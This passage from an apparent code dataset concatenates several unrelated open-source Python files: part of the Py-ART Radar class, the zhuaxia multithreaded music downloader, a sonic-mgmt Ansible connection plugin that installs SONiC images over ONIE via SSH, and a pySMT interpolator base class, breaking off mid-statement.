if the antenna_transition attribute is not available (set to None).
Returns
-------
x, y, z : 2D array
Array containing the x, y and z distances from the radar in
meters for the center (or edges) for all gates in the sweep.
"""
azimuths = self.get_azimuth(sweep)
elevations = self.get_elevation(sweep)
if filter_transitions and self.antenna_transition is not None:
sweep_slice = self.get_slice(sweep)
valid = self.antenna_transition['data'][sweep_slice] == 0
azimuths = azimuths[valid]
elevations = elevations[valid]
return antenna_vectors_to_cartesian(
self.range['data'], azimuths, elevations, edges=edges)
def get_gate_lat_lon_alt(self, sweep, reset_gate_coords=False,
filter_transitions=False):
"""
Return the longitude, latitude and altitude gate locations.
Longitude and latitude are in degrees and altitude in meters.
With the default parameter this method returns the same data as
contained in the gate_latitude, gate_longitude and gate_altitude
attributes but this method performs the gate location calculations
only for the specified sweep and therefore is more efficient than
accessing this data through these attributes. If the coordinates have
changed at all, please use the reset_gate_coords parameter.
Parameters
----------
sweep : int
Sweep number to retrieve gate locations from, 0 based.
reset_gate_coords : bool, optional
Optional to reset the gate latitude, gate longitude and gate
altitude attributes before using them in this function. This
is useful when the geographic coordinates have changed and gate
latitude, gate longitude and gate altitude need to be reset.
filter_transitions : bool, optional
True to remove rays where the antenna was in transition between
sweeps. False will include these rays. No rays will be removed
if the antenna_transition attribute is not available (set to None).
Returns
-------
lat, lon, alt : 2D array
Arrays containing the latitude, longitude and altitude
for all gates in the sweep.
"""
s = self.get_slice(sweep)
if reset_gate_coords:
gate_latitude = LazyLoadDict(get_metadata('gate_latitude'))
gate_latitude.set_lazy('data', _gate_lon_lat_data_factory(self, 1))
self.gate_latitude = gate_latitude
gate_longitude = LazyLoadDict(get_metadata('gate_longitude'))
gate_longitude.set_lazy('data', _gate_lon_lat_data_factory(self, 0))
self.gate_longitude = gate_longitude
gate_altitude = LazyLoadDict(get_metadata('gate_altitude'))
gate_altitude.set_lazy('data', _gate_altitude_data_factory(self))
self.gate_altitude = gate_altitude
lat = self.gate_latitude['data'][s]
lon = self.gate_longitude['data'][s]
alt = self.gate_altitude['data'][s]
if filter_transitions and self.antenna_transition is not None:
valid = self.antenna_transition['data'][s] == 0
lat = lat[valid]
lon = lon[valid]
alt = alt[valid]
return lat, lon, alt
def get_nyquist_vel(self, sweep, check_uniform=True):
"""
Return the Nyquist velocity in meters per second for a given sweep.
Raises a LookupError if the Nyquist velocity is not available, an
Exception is raised if the velocities are not uniform in the sweep
unless check_uniform is set to False.
Parameters
----------
sweep : int
Sweep number to retrieve data for, 0 based.
check_uniform : bool
True to perform a check that the Nyquist velocities are uniform in
the sweep. False will skip this check and
return the velocity of the first ray in the sweep.
Returns
-------
nyquist_velocity : float
Nyquist velocity in m/s for the given sweep.
"""
s = self.get_slice(sweep)
try:
nyq_vel = self.instrument_parameters['nyquist_velocity']['data'][s]
except:
raise LookupError('Nyquist velocity unavailable')
if check_uniform:
if np.any(nyq_vel != nyq_vel[0]):
raise Exception('Nyquist velocities are not uniform in sweep')
return float(nyq_vel[0])
# Methods
def info(self, level='standard', out=sys.stdout):
"""
Print information on radar.
Parameters
----------
level : {'compact', 'standard', 'full', 'c', 's', 'f'}, optional
Level of information on radar object to print, compact is
minimal information, standard more and full everything.
out : file-like, optional
Stream to direct output to, default is to print information
to standard out (the screen).
"""
if level == 'c':
level = 'compact'
elif level == 's':
level = 'standard'
elif level == 'f':
level = 'full'
if level not in ['standard', 'compact', 'full']:
raise ValueError('invalid level parameter')
self._dic_info('altitude', level, out)
self._dic_info('altitude_agl', level, out)
self._dic_info('antenna_transition', level, out)
self._dic_info('azimuth', level, out)
self._dic_info('elevation', level, out)
print('fields:', file=out)
for field_name, field_dic in self.fields.items():
self._dic_info(field_name, level, out, field_dic, 1)
self._dic_info('fixed_angle', level, out)
if self.instrument_parameters is None:
print('instrument_parameters: None', file=out)
else:
print('instrument_parameters:', file=out)
for name, dic in self.instrument_parameters.items():
self._dic_info(name, level, out, dic, 1)
self._dic_info('latitude', level, out)
self._dic_info('longitude', level, out)
print('nsweeps:', self.nsweeps, file=out)
print('ngates:', self.ngates, file=out)
print('nrays:', self.nrays, file=out)
if self.radar_calibration is None:
print('radar_calibration: None', file=out)
else:
print('radar_calibration:', file=out)
for name, dic in self.radar_calibration.items():
self._dic_info(name, level, out, dic, 1)
self._dic_info('range', level, out)
self._dic_info('scan_rate', level, out)
print('scan_type:', self.scan_type, file=out)
self._dic_info('sweep_end_ray_index', level, out)
self._dic_info('sweep_mode', level, out)
self._dic_info('sweep_number', level, out)
self._dic_info('sweep_start_ray_index', level, out)
self._dic_info('target_scan_rate', level, out)
self._dic_info('time', level, out)
# Airborne radar parameters
if self.rotation is not None:
self._dic_info('rotation', level, out)
if self.tilt is not None:
self._dic_info('tilt', level, out)
if self.roll is not None:
self._dic_info('roll', level, out)
if self.drift is not None:
self._dic_info('drift', level, out)
if self.heading is not None:
self._dic_info('heading', level, out)
if self.pitch is not None:
self._dic_info('pitch', level, out)
if self.georefs_applied is not None:
self._dic_info('georefs_applied', level, out)
# always print out all metadata last
self._dic_info('metadata', 'full', out)
def _dic_info(self, attr, level, out, dic=None, ident_level=0):
""" Print information on a dictionary attribute. """
if dic is None:
dic = getattr(self, attr)
ilvl0 = '\t' * ident_level
ilvl1 = '\t' * (ident_level + 1)
if dic is None:
print(str(attr) + ': None', file=out)
return
# make a string summary of the data key if it exists.
if 'data' not in dic:
d_str = 'Missing'
elif not isinstance(dic['data'], np.ndarray):
d_str = '<not a ndarray>'
else:
data = dic['data']
t = (data.dtype, data.shape)
d_str = '<ndarray of type: %s and shape: %s>' % t
# compact, only data summary
if level == 'compact':
print(ilvl0 + str(attr) + ':', d_str, file=out)
# standard, all keys, only summary for data
elif level == 'standard':
print(ilvl0 + str(attr) + ':', file=out)
print(ilvl1 + 'data:', d_str, file=out)
for key, val in dic.items():
if key == 'data':
continue
print(ilvl1 + key + ':', val, file=out)
# full, all keys, full data
elif level == 'full':
print(str(attr) + ':', file=out)
if 'data' in dic:
print(ilvl1 + 'data:', dic['data'], file=out)
for key, val in dic.items():
if key == 'data':
continue
print(ilvl1 + key + ':', val, file=out)
return
def add_field(self, field_name, dic, replace_existing=False):
"""
Add a field to the object.
Parameters
----------
field_name : str
Name of the field to add to the dictionary of fields.
dic : dict
Dictionary contain field data and metadata.
replace_existing : bool, optional
True to replace the existing field with key field_name if it
        exists, losing any existing data. False will raise a ValueError
when the field already exists.
"""
# check that the field dictionary to add is valid
if field_name in self.fields and replace_existing is False:
err = 'A field with name: %s already exists' % (field_name)
raise ValueError(err)
if 'data' not in dic:
raise KeyError("dic must contain a 'data' key")
if dic['data'].shape != (self.nrays, self.ngates):
t = (self.nrays, self.ngates)
err = "'data' has invalid shape, should be (%i, %i)" % t
raise ValueError(err)
# add the field
self.fields[field_name] = dic
return
def add_field_like(self, existing_field_name, field_name, data,
replace_existing=False):
"""
        Add a field to the object with metadata from an existing field.
Note that the data parameter is not copied by this method.
If data refers to a 'data' array from an existing field dictionary, a
copy should be made within or prior to using this method. If this is
not done the 'data' key in both field dictionaries will point to the
same NumPy array and modification of one will change the second. To
copy NumPy arrays use the copy() method. See the Examples section
for how to create a copy of the 'reflectivity' field as a field named
'reflectivity_copy'.
Parameters
----------
existing_field_name : str
Name of an existing field to take metadata from when adding
the new field to the object.
field_name : str
Name of the field to add to the dictionary of fields.
data : array
Field data. A copy of this data is not made, see the note above.
replace_existing : bool, optional
True to replace the existing field with key field_name if it
        exists, losing any existing data. False will raise a ValueError
when the field already exists.
Examples
--------
>>> radar.add_field_like('reflectivity', 'reflectivity_copy',
... radar.fields['reflectivity']['data'].copy())
"""
if existing_field_name not in self.fields:
err = 'field %s does not exist in object' % (existing_field_name)
raise ValueError(err)
dic = {}
for k, v in self.fields[existing_field_name].items():
if k != 'data':
dic[k] = v
dic['data'] = data
return self.add_field(field_name, dic,
replace_existing=replace_existing)
def extract_sweeps(self, sweeps):
"""
        Create a new radar containing only the data from the selected sweeps.
Parameters
----------
sweeps : array_like
Sweeps (0-based) to include in new Radar object.
Returns
-------
radar : Radar
Radar object which contains a copy of data from the selected
sweeps.
"""
# parse and verify parameters
sweeps = np.array(sweeps, dtype='int32')
if np.any(sweeps > (self.nsweeps - 1)):
raise ValueError('invalid sweeps indices in sweeps parameter')
if np.any(sweeps < 0):
raise ValueError('only positive sweeps can be extracted')
def mkdic(dic, select):
""" Make a dictionary, selecting out select from data key """
if dic is None:
return None
d = dic.copy()
if 'data' in d and select is not None:
d['data'] = d['data'][select].copy()
return d
# create array of rays which select the sweeps selected and
# the number of rays per sweep.
ray_count = (self.sweep_end_ray_index['data'] -
self.sweep_start_ray_index['data'] + 1)[sweeps]
ssri = self.sweep_start_ray_index['data'][sweeps]
rays = np.concatenate(
[range(s, s+e) for s, e in zip(ssri, ray_count)]).astype('int32')
# radar location attribute dictionary selector
if len(self.altitude['data']) == 1:
loc_select = None
else:
loc_select = sweeps
# create new dictionaries
time = mkdic(self.time, rays)
_range = mkdic(self.range, None)
fields = {}
for field_name, dic in self.fields.items():
fields[field_name] = mkdic(dic, rays)
metadata = mkdic(self.metadata, None)
scan_type = str(self.scan_type)
latitude = mkdic(self.latitude, loc_select)
longitude = mkdic(self.longitude, loc_select)
altitude = mkdic(self.altitude, loc_select)
altitude_agl = mkdic(self.altitude_agl, loc_select)
sweep_number = mkdic(self.sweep_number, sweeps)
sweep_mode = mkdic(self.sweep_mode, sweeps)
fixed_angle = mkdic(self.fixed_angle, sweeps)
sweep_start_ray_index = mkdic(self.sweep_start_ray_index, None)
sweep_start_ray_index['data'] = np.cumsum(
np.append([0], ray_count[:-1]), dtype='int32')
sweep_end_ray_index = mkdic(self.sweep_end_ray_index, None)
sweep_end_ray_index['data'] = np.cumsum(ray_count, dtype='int32') - 1
target_scan_rate = mkdic(self.target_scan_rate, sweeps)
azimuth = mkdic(self.azimuth, rays)
elevation = mkdic(self.elevation, rays)
scan_rate = mkdic(self.scan_rate, rays)
antenna_transition = mkdic(self.antenna_transition, rays)
# instrument_parameters
        # Filter the instrument_parameters dictionary based on the size of the
        # leading dimension; this might not always be correct.
if self.instrument_parameters is None:
instrument_parameters = None
else:
instrument_parameters = {}
for key, dic in self.instrument_parameters.items():
if dic['data'].ndim != 0:
dim0_size = dic['data'].shape[0]
else:
dim0_size = -1
if dim0_size == self.nsweeps:
fdic = mkdic(dic, sweeps)
elif dim0_size == self.nrays:
fdic = mkdic(dic, rays)
else: # keep everything
fdic = mkdic(dic, None)
instrument_parameters[key] = fdic
# radar_calibration
        # copy all fields in radar_calibration as is except for
        # r_calib_index, which we filter based upon time. This might
# leave some indices in the "r_calib" dimension not referenced in
# the r_calib_index array.
if self.radar_calibration is None:
radar_calibration = None
else:
radar_calibration = {}
for key, dic in self.radar_calibration.items():
if key == 'r_calib_index':
radar_calibration[key] = mkdic(dic, rays)
else:
radar_calibration[key] = mkdic(dic, None)
return Radar(time, _range, fields, metadata, scan_type,
latitude, longitude, altitude,
sweep_number, sweep_mode, fixed_angle,
sweep_start_ray_index, sweep_end_ray_index,
azimuth, elevation,
altitude_agl=altitude_agl,
target_scan_rate=target_scan_rate,
scan_rate=scan_rate,
antenna_transition=antenna_transition,
instrument_parameters=instrument_parameters,
radar_calibration=radar_calibration)
def _rays_per_sweep_data_factory(radar):
""" Return a function which returns the number of rays per sweep. """
def _rays_per_sweep_data():
""" The function which returns the number of rays per sweep. """
return (radar.sweep_end_ray_index['data'] -
radar.sweep_start_ray_index['data'] + 1)
return _rays_per_sweep_data
def _gate_data_factory(radar, coordinate):
""" Return a function which returns the Cartesian locations of gates. """
def _gate_data():
""" The function which returns the Cartesian locations of gates. """
ranges = radar.range['data']
azimuths = radar.azimuth['data']
elevations = radar.elevation['data']
cartesian_coords = antenna_vectors_to_cartesian(
ranges, azimuths, elevations, edges=False)
# load x, y, and z data except for the coordinate in question
if coordinate != 0:
radar.gate_x['data'] = cartesian_coords[0]
if coordinate != 1:
radar.gate_y['data'] = cartesian_coords[1]
if coordinate != 2:
radar.gate_z['data'] = cartesian_coords[2]
return cartesian_coords[coordinate]
return _gate_data
def _gate_lon_lat_data_factory(radar, coordinate):
""" Return a function which returns the geographic locations of gates. """
def _gate_lon_lat_data():
""" The function which returns the geographic locations gates. """
x = radar.gate_x['data']
y = radar.gate_y['data']
projparams = radar.projection.copy()
if projparams.pop('_include_lon_0_lat_0', False):
projparams['lon_0'] = radar.longitude['data'][0]
projparams['lat_0'] = radar.latitude['data'][0]
geographic_coords = cartesian_to_geographic(x, y, projparams)
# set the other geographic coordinate
if coordinate == 0:
radar.gate_latitude['data'] = geographic_coords[1]
else:
radar.gate_longitude['data'] = geographic_coords[0]
return geographic_coords[coordinate]
return _gate_lon_lat_data
def _gate_altitude_data_factory(radar):
""" Return a function which returns the gate altitudes. """
def _gate_altitude_data():
""" The function which returns the gate altitudes. """
try:
return radar.altitude['data'] + radar.gate_z['data']
except ValueError:
return np.mean(radar.altitude['data']) + radar.gate_z['data']
return _gate_altitude_data
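# --- Hedged usage sketch (editor addition, not part of the Py-ART API) ---
# A minimal illustration of extract_sweeps and add_field_like on an
# already-constructed Radar instance; 'radar_obj' and the 'reflectivity'
# field are assumptions made for the sake of the example.
def _example_extract_and_copy_field(radar_obj):
    """ Copy the first sweep and duplicate its 'reflectivity' field. """
    single_sweep = radar_obj.extract_sweeps([0])
    single_sweep.add_field_like(
        'reflectivity', 'reflectivity_copy',
        single_sweep.fields['reflectivity']['data'].copy())
    return single_sweep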
|
zhuaxia/downloader.py
|
yangchuansheng/zhuaxia
| 332 |
122236
|
<reponame>yangchuansheng/zhuaxia
# -*- coding:utf-8 -*-
from os import path
import os
import datetime
import sys
import requests
import config, log, util
import time
import hist_handler
import traceback
from threadpool import ThreadPool
from Queue import Queue
from mutagen.id3 import ID3,TRCK,TIT2,TALB,TPE1,APIC,TDRC,COMM,TPOS,USLT
from threading import Thread
#see download_url_urllib doc
import urllib2
import pydoc
import codecs
LOG = log.get_logger('zxLogger')
if config.LANG.upper() == 'CN':
import i18n.msg_cn as msg
else:
import i18n.msg_en as msg
#total number of jobs
total=0
#the number of finished jobs
done=0
#progress dictionary, for progress display. {filename:Download_Progress obj}
progress = {}
#finished jobs to be shown in progress
done2show=[]
#success/failed song lists (song objects)
success_list=[]
failed_list=[]
class Download_Progress(object):
"""
a download progress object
"""
def __init__(self, filename):
self.filename = filename
self.total_length = 0
self.finished_length =0
self.start = datetime.datetime.now()
def percent(self):
"""calculate downloaded percentage"""
return float(self.finished_length) / float(self.total_length) if self.total_length else 0.0
def rate(self):
""" calculate downloading rate """
elapsed = datetime.datetime.now() - self.start
        return float(self.finished_length)/float(elapsed.total_seconds())/1024
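# Hedged example (editor addition): how a Download_Progress instance reports
# progress; the byte counts below are illustrative only.
def _example_progress_report():
    prog = Download_Progress('demo.mp3')
    prog.total_length = 4 * 1024 * 1024   # assume a 4 MiB file
    prog.finished_length = 1024 * 1024    # assume 1 MiB downloaded so far
    return '%.0f%% done at %.1f KiB/s' % (prog.percent() * 100, prog.rate())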
class Downloader(Thread):
def __init__(self, songs, pool):
Thread.__init__(self)
self.songs = songs
self.pool = pool
def run(self):
global progress
for song in self.songs:
self.pool.add_task(download_single_song, song)
self.pool.wait_completion()
def get_proxy(song):
proxy = None
if song.handler.need_proxy_pool:
proxy = {'http':song.handler.proxy_pool.get_proxy()}
elif song.handler.proxy:
proxy={'http': song.handler.proxy}
return proxy
def write_mp3_meta(song):
"""
write mp3 meta data to downloaded mp3 files
@song an Song instance
"""
id3 = ID3()
id3.add(TIT2(encoding=3, text=song.song_name))
id3.add(TALB(encoding=3, text=song.album_name))
id3.add(TPE1(encoding=3, text=song.artist_name))
id3.add(TRCK(encoding=3, text=str(song.track_no)))
id3.save(song.abs_path)
def print_progress():
""" print progress info """
#the factor of width used for progress bar
percent_bar_factor = 0.4
width = util.get_terminal_size()[1] -5
bar_count = (int(width*percent_bar_factor)-2/10) # number of percent bar
#line = log.hl(u' %s\n'% ('-'*90), 'cyan')
line = log.hl(u' %s\n'% ('+'*width), 'cyan')
sep = log.hl(u' %s\n'% ('='*width), 'cyan')
sys.stdout.write(u'\x1b[2J\x1b[H') #clear screen
sys.stdout.write(line)
header = msg.fmt_dl_header % (config.DOWNLOAD_DIR, config.THREAD_POOL_SIZE)
#header = util.ljust(header, width)
sys.stdout.write(log.hl(u' %s'%header,'warning'))
sys.stdout.write(line)
fmt_progress = '%s [%s] %.1f%% (%dkib/s)\n'
all_p = [] #all progress bars, filled by following for loop
sum_percent = 0 # total percent for running job
sum_rate = 0 # total rate for running job
total_percent = 0
for filename, prog_obj in progress.items():
percent = prog_obj.percent()
rate = prog_obj.rate()
#sum for the total progress
sum_percent += percent
sum_rate += rate
bar = util.ljust('=' * int(percent * bar_count), bar_count)
per100 = percent * 100
single_p = fmt_progress % \
(util.rjust(filename,(width - bar_count -22)), bar, per100,rate) # the -20 is for the xx.x% and [ and ] xx.xkb/s (spaces)
all_p.append(log.hl(single_p,'green'))
#calculate total progress percent
total_percent = float(sum_percent+done)/total
#global progress
g_text = msg.fmt_dl_progress % (done, total)
g_bar = util.ljust('#' * int(total_percent* bar_count), bar_count)
g_progress = fmt_progress % \
(util.rjust(g_text,(width - bar_count -22)), g_bar, 100*total_percent,sum_rate) # the -20 is for the xx.x% and [ and ] xx.xkb/s (spaces)
#output all total progress bars
sys.stdout.write(log.hl(u'%s'%g_progress, 'red'))
sys.stdout.write(sep)
#output all downloads' progress bars
sys.stdout.write(''.join(all_p))
# finished jobs
if len(done2show):
sys.stdout.write(line)
sys.stdout.write(log.hl(msg.fmt_dl_last_finished % config.SHOW_DONE_NUMBER,'warning'))
sys.stdout.write(line)
#display finished jobs
for d in done2show:
sys.stdout.write(log.hl(u' √ %s\n'% d,'cyan'))
#failed downloads
if len(failed_list):
sys.stdout.write(line)
sys.stdout.write(log.hl(msg.fmt_dl_failed_jobs,'error'))
sys.stdout.write(line)
#display failed jobs
for failed_song in failed_list:
sys.stdout.write(log.hl(u' ✘ %s\n' % failed_song.filename,'red'))
sys.stdout.write(line)
sys.stdout.flush()
def fill_download_progress(filename, total_length, finished_length):
""" fill the global dict progress {} with download progress """
global progress
if filename in progress:
prog_obj = progress[filename]
prog_obj.total_length = total_length
prog_obj.finished_length = finished_length
else:
prog_obj = Download_Progress(filename)
progress[filename] = prog_obj
def download_url_urllib(url,filepath,show_progress=False, proxy=None):
"""
this function does the samething as the download_url(). The different is
this function uses the standard urllib2 to download files.
basic downloading function, download url and save to
file path
http.get timeout: 30s
"""
if ( not filepath ) or (not url):
        LOG.error( 'Url or filepath is not valid, resource cannot be downloaded.')
return 1
fname = path.basename(filepath)
try:
proxyServer = urllib2.ProxyHandler(proxy) if proxy else None
opener = urllib2.build_opener()
if proxyServer:
opener = urllib2.build_opener(proxyServer)
urllib2.install_opener(opener)
r = urllib2.urlopen(url, timeout=30)
if r.getcode() == 200:
total_length = int(r.info().getheader('Content-Length').strip())
done_length = 0
chunk_size=1024
with open(filepath,'wb') as f:
while True:
chunk = r.read(chunk_size)
done_length += len(chunk)
if not chunk:
break
f.write(chunk)
if show_progress:
fill_download_progress(fname, total_length, done_length)
return 0
else:
LOG.debug("[DL_URL] HTTP Status %d . Song: %s " % (r.status_code,fname))
return 1
except Exception, err:
LOG.debug("[DL_URL] downloading song %s timeout!" % fname)
LOG.debug(traceback.format_exc())
return 1
def download_url(url,filepath,show_progress=False, proxy=None):
"""
basic downloading function, download url and save to
file path
http.get timeout: 30s
"""
if ( not filepath ) or (not url):
        LOG.error( 'Url or filepath is not valid, resource cannot be downloaded.')
return 1
fname = path.basename(filepath)
try:
#get request timeout 30 s
r = requests.get(url, stream=True, timeout=30, proxies=proxy)
if r.status_code == 200:
total_length = int(r.headers.get('content-length'))
done_length = 0
with open(filepath,'wb') as f:
for chunk in r.iter_content(1024):
done_length += len(chunk)
f.write(chunk)
if show_progress:
fill_download_progress(fname, total_length, done_length)
return 0
else:
LOG.debug("[DL_URL] HTTP Status %d . Song: %s " % (r.status_code,fname))
return 1
except Exception, err:
LOG.debug("[DL_URL] downloading song %s timeout!" % fname)
LOG.debug(traceback.format_exc())
return 1
def download_single_song(song):
"""
download a single song
max retry 5 times
"""
global done, progress
#download retry count
retry = 5
if ( not song.filename ) or (not song.dl_link):
LOG.error( 'Song [id:%s] cannot be downloaded. Filename or dl_link is missing.' % song.song_id)
fill_failed_list(song)
done+=1
return
mp3_file = song.abs_path
dl_result = -1 # download return code
LOG.debug("[DL_Song] downloading: %s " % song.dl_link)
while retry > 0 :
retry -= 1
LOG.debug("[DL_Song] start downloading: %s retry: %d" % (mp3_file, 5-retry))
#if file not in progress, add
if song.filename not in progress:
fill_download_progress(song.filename, 0.0, 0.0)
#do the actual downloading
dl_result = download_url_urllib(song.dl_link, mp3_file, show_progress=True, proxy= get_proxy(song))
if dl_result == 0: #success
write_mp3_meta(song)
LOG.debug("[DL_Song] Finished: %s" % mp3_file)
break
else: # return code is not 0
#remove from progress
del progress[song.filename]
if path.exists(song.abs_path):
#remove file if already exists
                LOG.debug( '[DL_Song] remove incomplete file : ' + song.abs_path)
os.remove(song.abs_path)
# retry
    done+=1 #no matter success or fail, the task was done
if dl_result == 0:
#set the success flag
song.success = True
fill_done2show(song)
#remove from progress
del progress[song.filename]
else:
        # if it comes here, all 5 retries have run out
fill_failed_list(song)
def fill_done2show(song):
"""
fill the given filename into global list 'done2show'
    Depending on config.SHOW_DONE_NUMBER, the oldest entry will be
    popped out from the list.
"""
global done2show, success_list
success_list.append(song)
if len(done2show) == config.SHOW_DONE_NUMBER:
done2show.pop()
done2show.insert(0, song.filename)
def fill_failed_list(song):
"""
    fill the given song into the global list 'failed_list'
"""
global failed_list
failed_list.insert(0,song)
def start_download(songs, skipped_hists):
"""
start multi-threading downloading songs. and generate a summary file
songs: the list of songs need to be downloaded
call the finish_hook function, pass skipped_hist
"""
global total
total = len(songs)
LOG.debug('init thread pool (%d) for downloading'% config.THREAD_POOL_SIZE)
pool = ThreadPool(config.THREAD_POOL_SIZE)
downloader = Downloader(songs, pool)
LOG.debug('Start downloading' )
downloader.start()
while done < total:
time.sleep(1)
print_progress()
# handling lyrics downloading
download_lyrics(songs)
print log.hl(msg.fmt_insert_hist, 'warning')
hist_handler.insert_hist(songs)
print log.hl(msg.fmt_all_finished, 'warning')
#call finish hook
finish_summary(skipped_hists)
def finish_summary(skipped_hist):
"""
build the summary after finishing all dl
skipped_hist: a History list, contains skipped songs, it is not empty only
if incremental_dl is true
"""
border= "\n"+u">>"*40 + u"\n"
#build summary text:
text = []
if skipped_hist:
text.append( border+msg.fmt_summary_skip_title +border)
text.append( msg.fmt_summary_skip_header)
for hist in skipped_hist:
text.append( "%s\t%s\t%s\t%s" % (msg.head_xm if hist.source ==1 else msg.head_163, hist.last_dl_time_str(), hist.song_name, hist.location))
if success_list:
text.append( border+msg.fmt_summary_success_title +border)
text.append( msg.fmt_summary_success_header)
for song in success_list:
text.append('%s\t%s'%(song.song_name, song.abs_path))
if failed_list:
text.append( border+msg.fmt_summary_failed_title +border)
text.append( msg.fmt_summary_failed_header)
for song in failed_list:
text.append('%s\t%s'%(song.song_name, song.abs_path))
while True:
sys.stdout.write(msg.summary_prompt)
choice = raw_input().lower()
if choice == 'q' or choice == '':
break
elif choice == 'v':
pydoc.pager(u"\n".join(text))
break
elif choice == 's':
summary = path.join(config.DOWNLOAD_DIR,'summary_'+str(datetime.datetime.today())+".txt")
with codecs.open(summary, 'w', 'utf-8') as f:
f.write("\n".join(text))
print log.hl(msg.summary_saved % summary ,'cyan')
break
else:
sys.stdout.write(msg.summary_prompt_err)
def download_lyrics(songs):
"""download / write lyric to file if it is needed"""
url_lyric_163 = "http://music.163.com/api/song/lyric?id=%s&lv=1"
percent_bar_factor = 0.4
width = util.get_terminal_size()[1] -5
bar_count = (int(width*percent_bar_factor)-2/10) # number of percent bar
line = log.hl(u' %s'% ('+'*width), 'cyan')
if songs[0].handler.dl_lyric == True:
print log.hl(msg.fmt_dl_lyric_start, 'warning')
print line
for song in songs:
if song.lyric_abs_path:
                print log.hl(u' %s '% song.lyric_filename,'cyan'), #the trailing comma hides the newline
if song.song_type == 1: #xiami
if song.handler.need_proxy_pool:
if song.lyric_link:
download_url(song.lyric_link, song.lyric_abs_path, show_progress=True, proxy=get_proxy(song))
else:
if song.lyric_link:
download_url(song.lyric_link, song.lyric_abs_path, show_progress=True)
print log.hl(u' √','cyan')
else: #163
lyric_link = url_lyric_163 % song.song_id
lyric_json = song.handler.read_link(lyric_link).json()
if not lyric_json or not lyric_json.has_key('lrc') or not lyric_json['lrc'].has_key('lyric'):
print log.hl(u' ✘ Not Found','red')
continue
song.lyric_text = song.handler.read_link(lyric_link).json()['lrc']['lyric']
import codecs
with codecs.open(song.lyric_abs_path, 'w', 'utf-8') as f:
f.write(song.lyric_text)
print log.hl(u' √','cyan')
print line
|
ansible/plugins/connection/onie.py
|
shubav/sonic-mgmt
| 132 |
122262
|
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import subprocess
import shlex
import pipes
import pexpect
import random
import select
import fcntl
import pwd
import time
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleConnectionFailure, AnsibleFileNotFound
from ansible.plugins.connection import ConnectionBase
class Connection(ConnectionBase):
''' ssh based connections with expect '''
def __init__(self, *args, **kwargs):
super(Connection, self).__init__(*args, **kwargs)
self.host = self._play_context.remote_addr
self.connection_retry_interval = 60
@property
def transport(self):
''' used to identify this connection object from other classes '''
return 'onie'
# The connection is created by running expect from the exec_command, so we don't
# need to do any connection management here.
    def _connect(self):
        self._connected = True
        return self
def _build_command(self):
self._ssh_command = ['ssh', '-tt', '-q']
ansible_ssh_args = C.ANSIBLE_SSH_ARGS
if ansible_ssh_args:
self._ssh_command += shlex.split(ansible_ssh_args)
else:
self._ssh_command += ['-o', 'ControlMaster=auto',
'-o', 'ControlPersist=60s',
'-o', 'ControlPath=/tmp/ansible-ssh-%h-%p-%r']
if not C.HOST_KEY_CHECKING:
self._ssh_command += ['-o', 'StrictHostKeyChecking=no']
self._ssh_command += ['-o', 'UserKnownHostsFile=/dev/null']
self._ssh_command += ['-o', 'GSSAPIAuthentication=no',
'-o', 'PubkeyAuthentication=no']
self._ssh_command += ['-o', 'ConnectTimeout=30']
def _spawn_connect(self):
client = None
cmd = self._ssh_command + ['-l', "root", self.host]
client = pexpect.spawn(' '.join(cmd), env={'TERM': 'dumb'})
client.expect(['#'])
self.before_backup = client.before.split()
return client
def exec_command(self, *args, **kwargs):
self.template = kwargs['template']
if kwargs['host'] is not None:
self.host = kwargs['host']
self.url = kwargs['url']
self.install = kwargs['install']
self.nretry = kwargs['retry']
self._build_command()
client = self._spawn_connect()
# Set command timeout after connection is spawned
if kwargs['timeout']:
client.timeout = int(kwargs['timeout'])
prompts = ["ONIE:.+ #", pexpect.EOF]
stdout = ""
if self.template:
cmds = self.template.split('\n')
else:
cmds = []
for cmd in cmds:
self._display.vvv('> %s' % (cmd), host=self.host)
client.sendline(cmd)
client.expect(prompts)
stdout += client.before
self._display.vvv('< %s' % (client.before), host=self.host)
if self.install:
client.sendline('onie-discovery-stop')
client.expect(prompts)
stdout += client.before
attempt = 0
while attempt < self.nretry:
client.sendline("onie-nos-install %s" % self.url)
i = client.expect(["Installed SONiC base image SONiC-OS successfully"] + prompts)
stdout += client.before
if i == 0:
break
elif i == 1:
attempt += 1
self._display.vvv("Installation fails, retry %d..." % attempt, host=self.host)
else:
raise AnsibleError("Failed to install sonic image. %s" % stdout)
self._display.vvv("SONiC installed.", host=self.host)
        # for some platforms, e.g., DELL S6000, the device will do a hard reboot,
        # which will not give an EOF
client.expect([pexpect.EOF, pexpect.TIMEOUT], timeout=15)
stdout += client.before
self._display.vvv("ONIE Rebooted. %s" % stdout, host=self.host)
return stdout
def put_file(self, in_path, out_path):
pass
def fetch_file(self, in_path, out_path):
pass
def close(self):
self._connected = False
|
pysmt/solvers/interpolation.py
|
Ying1123/pysmt
| 435 |
122290
|
#
# This file is part of pySMT.
#
# Copyright 2014 <NAME> and <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Interpolator(object):
def __init__(self):
self._destroyed = False
def binary_interpolant(self, a, b):
"""Returns a binary interpolant for the pair (a, b), if And(a, b) is
        unsatisfiable, or None if And(a, b) is satisfiable.
"""
raise NotImplementedError
def sequence_interpolant(self, formulas):
"""Returns a sequence interpolant for the conjunction of formulas, or
None if the problem is satisfiable.
"""
raise NotImplementedError
def __enter__(self):
"""Manage entering a Context (i.e., with statement)"""
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Manage exiting from Context (i.e., with statement)
        The default behaviour is to explicitly destroy the interpolator to
free the associated resources.
"""
self.exit()
def exit(self):
"""Destroys the solver and closes associated resources."""
if not self._destroyed:
self._exit()
self._destroyed = True
def _exit(self):
"""Destroys the solver and closes associated resources."""
raise NotImplementedError
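# Hedged sketch (editor addition): a minimal concrete subclass illustrating the
# context-manager lifecycle of Interpolator; it performs no real interpolation,
# and '_NoOpInterpolator' is not part of pySMT.
class _NoOpInterpolator(Interpolator):
    def binary_interpolant(self, a, b):
        return None  # pretend And(a, b) is satisfiable

    def sequence_interpolant(self, formulas):
        return None  # pretend the conjunction is satisfiable

    def _exit(self):
        pass  # nothing to free in this sketch


if __name__ == '__main__':
    with _NoOpInterpolator() as itp:
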